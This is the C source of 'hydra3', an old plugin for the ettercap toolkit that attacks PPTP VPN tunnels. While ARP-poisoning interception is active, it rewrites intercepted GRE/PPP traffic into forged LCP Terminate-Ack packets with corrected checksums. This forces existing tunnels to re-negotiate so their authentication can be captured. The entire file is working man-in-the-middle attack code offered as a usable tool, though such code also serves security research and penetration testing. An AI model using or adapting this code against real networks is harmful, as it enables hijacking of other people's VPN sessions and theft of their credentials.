/*
    hydra3 -- ettercap plugin -- Forces re-negotiation on an existing PPTP tunnel

    Copyright (C) 2003  ALoR <alor@users.sourceforge.net>, NaGA <crwm@freemail.it>
    
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

    $Id: H05_hydra3.c,v 1.1 2003/01/22 14:20:42 lordnaga Exp $
*/

#include <stdlib.h>

#ifndef CYGWIN
#include <unistd.h>
#endif

#include <sys/types.h>
#include <stdio.h>
#include <string.h>

#include "../../src/include/ec_main.h"
#include "../../src/include/ec_version.h"
#include "../../src/include/ec_plugins.h"
#include "../../src/include/ec_inet_structures.h"
#include "../../src/include/ec_inet.h"

// protos....

int Plugin_Init(void *);
int Plugin_Fini(void *);
int hydra3(void *buffer);

// plugin operation

struct plugin_ops hydra3_ops = {
   ettercap_version: VERSION,
   plug_info:        "PPTP: Forces re-negotiation",
   plug_version:     10,
   plug_type:        PT_HOOK,
   hook_point:       PCK_RECEIVED_RAW,
   hook_function:    &hydra3,
};


struct pptp_gre_header {
	u_char flags;		
	u_char ver;		
	u_short protocol;	
	u_short payload_len;	
	u_short call_id;	
	u_int32_t seq;		
	u_int32_t ack;		
};

#define PPTP_GRE_PROTO	0x880B
#define PPTP_GRE_VER	0x1

#define PPTP_GRE_IS_C(f) ((f) & 0x80)
#define PPTP_GRE_IS_R(f) ((f) & 0x40)
#define PPTP_GRE_IS_K(f) ((f) & 0x20)
#define PPTP_GRE_IS_S(f) ((f) & 0x10)
#define PPTP_GRE_IS_A(f) ((f) & 0x80)

struct ppp_header {
	u_char address;
	u_char control;
	u_short proto;
};

struct ppp_lcp_header {
	u_char code;
	u_char ident;
	u_short length;
};

#define PPP_PROTO_LCP		0xc021
#define PPP_TERMINATE_ACK   	0x06

struct saved_call {
	u_int IP1;
	u_int IP2;
	u_short call_id;
};

#define MAX_CALL 100
struct saved_call *s_call[MAX_CALL];

//==================================

int Plugin_Init(void *params)
{
   return Plugin_Register(params, &hydra3_ops);
}

int Plugin_Fini(void *params)
{
   return 0;
}

// =================================

int Found_in_List(u_int IP1, u_int IP2, u_short Callid)
{
    int i;
    for (i=0; i<MAX_CALL && s_call[i]; i++)
    {
	if ( (s_call[i]->IP1==IP1 && s_call[i]->IP2==IP2) ||
	     (s_call[i]->IP1==IP2 && s_call[i]->IP2==IP1) )
	         if (s_call[i]->call_id == Callid) return 1;
    }
    
    if (i==MAX_CALL) return 1;
    
    s_call[i]=malloc(sizeof(struct saved_call));
    s_call[i]->IP1 = IP1;
    s_call[i]->IP2 = IP2;
    s_call[i]->call_id = Callid;
    return 0;
}

int hydra3(void *buffer)              
{                                    
   IP_header  *ip;
   ETH_header *eth;
   RAW_PACKET *pck_raw;
   struct pptp_gre_header *pgh;
   struct ppp_header *ppp;
   struct ppp_lcp_header *lcp;
   u_short proto;
   unsigned int pghlen;
   static int flag=0;
   
   pck_raw = (RAW_PACKET *)buffer;

   eth = (ETH_header *) pck_raw->buffer;
   
   if (!Options.arpsniff && !flag)
   {
      Plugin_Hook_Output("You have to use arpsniff to summon hydra3...\n");
      flag=1;
   }
   
   if ( ntohs(eth->type) == ETH_P_IP && Options.arpsniff )
   {
      ip = (IP_header *)(eth+1);
      if (ip->proto != IPPROTO_GRE) return (0);
      
      if (ntohs(ip->t_len) < (pghlen = sizeof(*pgh)) +  IP_HEADER)
	return (0);
		
      pgh = (struct pptp_gre_header *)((int)ip + ip->h_len * 4);
	
      if ((pgh->ver & 0x7f) != PPTP_GRE_VER ||
	   ntohs(pgh->protocol) != PPTP_GRE_PROTO ||
	   PPTP_GRE_IS_C(pgh->flags) || PPTP_GRE_IS_R(pgh->flags) ||
	   PPTP_GRE_IS_K(pgh->flags) == 0 || (pgh->flags & 0xf) != 0) 
		return (0);
	
      if (PPTP_GRE_IS_S(pgh->flags) == 0) return (0);
	
      if (PPTP_GRE_IS_A(pgh->ver) == 0) pghlen -= sizeof(pgh->ack);

      if (ntohs(ip->t_len) < ntohs(pgh->payload_len) + pghlen + IP_HEADER)
		return (0);

      ppp = (struct ppp_header *)((unsigned int)pgh + pghlen);

      if (ppp->address != 0xff && ppp->control != 0x3) 
	    proto = ntohs(*((short *)ppp));
      else 
	    proto = ntohs(ppp->proto);
      
      if (Found_in_List(ip->source_ip, ip->dest_ip, pgh->call_id)) return 0;

      // We assume a new connection...so no reset
      if (proto == PPP_PROTO_LCP) return 0;

      ppp->proto = htons(PPP_PROTO_LCP);
      
      ppp->address = 0xff;
      ppp->control = 0x3;
      
      lcp = (struct ppp_lcp_header *)(ppp + 1);
      
      lcp->code = PPP_TERMINATE_ACK;      
      lcp->ident = 0x01; //or a higher value
      lcp->length = htons(sizeof(*lcp));
      pgh->payload_len = htons(sizeof(*lcp)+sizeof(*ppp));

      ip->t_len = htons (ip->h_len*4 + pghlen + ntohs(pgh->payload_len));
      ip->checksum = 0;
      ip->checksum = Inet_Forge_ChecksumIP( (u_short *)ip, ip->h_len*4 );
      *(pck_raw->len)=ntohs(ip->t_len) + ETH_HEADER; //adjust packet  
   }
   return 0;
}

/* EOF */
